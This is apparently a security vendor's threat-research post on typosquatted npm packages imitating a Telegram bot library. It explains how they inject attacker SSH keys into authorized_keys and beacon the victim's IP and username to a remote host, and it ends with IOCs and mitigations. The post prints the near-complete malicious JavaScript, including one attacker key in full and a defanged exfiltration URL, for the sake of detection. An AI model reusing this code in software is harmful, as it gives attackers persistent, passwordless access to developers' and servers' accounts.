npm Malware Targets Telegram Bot Developers with Persistent SSH Backdoors

Malicious npm packages posing as Telegram bot libraries install SSH backdoors and exfiltrate data from Linux developer machines.

Kush Pandya

April 18, 2025

Socket’s Threat Research Team has uncovered a new supply chain attack: typosquatted Telegram bot libraries delivering SSH backdoors and data exfiltration routines.

Telegram’s Developer Playground

Telegram is one of the most popular messaging platforms in the world and increasingly a major target for attackers. Its open ecosystem and bot-friendly architecture make it appealing to developers, but also ripe for abuse.

Telegram now boasts over 1 billion monthly active users as of 2025, including more than 12 million paying subscribers.

The platform does not have a centralized or official app store for bots, and anyone can create and publish bots using the Bot API without a formal vetting process. Although there is some moderation on the platform (e.g. abuse reporting, spam detection), this typically applies after deployment, not during a review or submission phase like with Apple’s App Store or Google Play.

Because Telegram Bot creation doesn't include a formal vetting process, its ecosystem remains wide open for abuse:

  • Large, Inexperienced Developer Base: Bot contests (prizes up to $50K) attract a flood of eager but often inexperienced developers who are less likely to scrutinize a dependency name.
  • No Gatekeeper: Without an official app directory, fake or malicious npm packages can easily be used in bots and apps without raising suspicion.

Since early 2025, we’ve observed multiple malicious npm packages masquerading as the popular node-telegram-bot-api (4.17 million+ downloads), the library most developers reach for when building a Telegram bot in Node.js. The typosquatted packages node-telegram-utils, node-telegram-bots-api, and node-telegram-util silently install a backdoor on the hosts where they are used.

These malicious packages collectively accumulated around 300 downloads over the past few months. While that number may sound modest, it only takes a single compromised environment to pave the way for wide-scale infiltration or unauthorized data access. Supply chain security incidents repeatedly show that even a handful of installs can have catastrophic repercussions, especially when attackers gain direct access to developer systems or production servers.

Total download count of all the malicious packages

Malicious Packages

Legitimate package: node-telegram-bot-api (~4.2 million downloads)

Malicious packages: node-telegram-utils, node-telegram-bots-api, node-telegram-util

These malicious packages copy the README of the legitimate one to create a false sense of authenticity and deceive developers.

Starjacking

These typosquatted packages even link their “Homepage” back to the real GitHub repo, surfacing its 19K+ stars in the npm sidebar. By hijacking that star count, they borrow trust from the legitimate project and fool developers at a glance.

SSH Backdoor: Persistent Access and Data Exfiltration

The malicious packages call a hidden function, addBotId(), from the bot class constructor, so the routine runs as soon as the developer's code instantiates a bot. Because it runs when the bot is constructed rather than when the package is installed, it fires on every host where the bot code is executed, whether a developer laptop or a production server. It performs:

  1. Automatic, Linux-Only Execution
    • addBotId() checks os.platform() when the bot object is constructed.
    • If Linux is detected, the malicious routine proceeds; no user interaction is required. macOS and Windows hosts are skipped.
  2. SSH Key Injection
    • The code appends 2 attacker-supplied SSH public keys to ~/.ssh/authorized_keys of the user running the bot, creating ~/.ssh with mode 0700 first if it does not exist.
    • Persistent, passwordless remote login is thus granted to whoever holds the matching private keys. If one key is removed, attackers can still use the other.
  3. Data Exfiltration
    • The script collects the system’s external IP (via ipinfo[.]io/ip) and the local username.
    • It immediately sends both to solana[.]validator[.]blog in a GET request, giving the attacker exactly the address and account name needed to log in to the newly backdoored host.

Because the short function below is buried within an otherwise authentic-looking Telegram bot library, developers can easily overlook it. Removing the package alone does not remove the injected SSH keys, leaving systems exposed to ongoing unauthorized access until authorized_keys itself is cleaned.

Malicious Code

```javascript
// Excerpt from the malicious package. The require() lines are added here for
// context. The package also defines getBotId(), not shown in the post, which
// fetches the host's external IP (the post names ipinfo[.]io/ip as the source).
const os = require('os');
const fs = require('fs');
const path = require('path');
const https = require('https');

async function addBotId() {
  const username = os.userInfo().username;
  // Two attacker keys joined by a newline, so one append writes both entries.
  // The first key's body is not reproduced here; the key comments
  // (sleeper@DESKTOP-GM46AVB, administrator@Kakashi-PC) are usable IOCs.
  const publicKey = `ssh-rsa ... sleeper@DESKTOP-GM46AVB \n ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDaDUmF1FSs6ZIP3Za94X9ehOdheKS4fXQMnOgmiFC4SKQsqHj63xIUCc2nZsRlMbzvxlCGp+MAKyEZSsqCH8QEZ9ye6ovd0wqI1zI1MJtTfMHIKdeVfdjjWgS9C14lX34j4iqAfZL6zkXWT20V3CFEM9UjJM3uvDs31t7FYN6CgB166lIUpxobpT5vfXIA8ZNVH230R9PSIWTSYSDq08bE/YbMouCHZ0RQHecq0AI3wiC4sT1HbUn48lJ37fDIJmfKLLPoNca6cK3Fl88CNQfWUpRsm4lF3Y8XPa6Hn5RQqgoYKd9QSfwOc63EvfqOIgfGuEC5P4BYuF5K/zF/GLeR administrator@Kakashi-PC`; // Multiple SSH keys for redundancy

  if (os.platform() === 'linux') {          // Linux hosts only; macOS and Windows are skipped
    try {
      const ipAddress = await getBotId();   // victim's external IP
      const sshDir = path.join(os.homedir(), '.ssh');   // home of whichever user runs the bot
      const authorizedKeysPath = path.join(sshDir, '.ssh' === '' ? '' : 'authorized_keys');

      if (!fs.existsSync(sshDir)) {
        fs.mkdirSync(sshDir, { mode: 0o700 }); // the permissions sshd expects, so the keys are accepted
      }

      // Append both keys unless the exact two-key string is already present (idempotent on re-run)
      if (!fs.existsSync(authorizedKeysPath) || !fs.readFileSync(authorizedKeysPath, 'utf8').includes(publicKey)) {
        fs.appendFileSync(authorizedKeysPath, `\n${publicKey}`);
      }

      // Beacon: reports IP and username to the attacker's server (URL defanged here)
      https.get(`hxxps://solana[.]validator[.]blog/v1/check?ip=${ipAddress}&name=${username}`);
    } catch (err) {
      console.error('Error:', err);
    }
  }
}
```
The code adds multiple attacker keys for persistent access and exfiltrates data.

Socket AI Scanner’s analysis, including contextual details about the malicious node-telegram-util package.

Real-World Impact

These malicious npm packages pose significant threats:

  • Persistent unauthorized server access via SSH, surviving removal of the package.
  • Data breaches: the beacon itself leaks only IP and username, but the SSH access it enables exposes everything the affected account can read, including source code, credentials, tokens and the user's own SSH keys.
  • Arbitrary command execution as the affected user over SSH, potentially leading to complete system compromise, especially where the bot runs as root or the user has sudo rights.

The sophistication and variety of these attacks highlight the critical risks to developer infrastructure, user privacy, and operational security.

Mitigating npm Malware Risks

The recent discoveries of malicious npm packages like those targeting Telegram (node-telegram-utils, node-telegram-bots-api, node-telegram-util) highlight the persistent threat actors pose to the software supply chain. Even a single compromised development machine or server can provide attackers a foothold for broader infiltration, unauthorized SSH access, and sensitive data exfiltration.

Attackers continue to demonstrate adaptability, leveraging trusted open source ecosystems like npm to distribute malware disguised as legitimate tools. Given recent patterns, we anticipate continued attacks utilizing advanced obfuscation techniques and evolving dynamic payload delivery methods.

To mitigate these risks, developers and organizations must proactively secure their software supply chains. Regular dependency audits and automated scanning tools are essential to detect and respond swiftly to malicious or anomalous behaviors in third-party packages before integration into production environments.

Socket’s GitHub app provides real-time monitoring of pull requests, flagging suspicious or malicious dependencies before merging. Implementing the Socket CLI during npm installations or builds further secures the pipeline by identifying vulnerabilities and anomalies before they reach production. Additionally, the Socket browser extension offers proactive protection by analyzing browsing activity and alerting developers to potential threats before downloading or interacting with malicious content. Integrating these layered security measures into development workflows substantially reduces the risk of software supply chain compromise.

Supplementary Materials & Indicators of Compromise (IOCs)

Malicious Packages

  • node-telegram-utils
  • node-telegram-bots-api
  • node-telegram-util

Malicious Authors

IOCs

  • Malicious URLs: solana[.]validator[.]blog
  • Injected SSH keys: entries in ~/.ssh/authorized_keys with the comments sleeper@DESKTOP-GM46AVB or administrator@Kakashi-PC (the second key's full public key is reproduced in the code sample above)

MITRE ATT&CK Techniques

  • T1195.002 — Supply Chain Compromise: Compromise Software Supply Chain
  • T1036.005 — Masquerading: Match Legitimate Name or Location
  • T1098.004 — Account Manipulation: SSH Authorized Keys
  • T1041 — Exfiltration Over C2 Channel
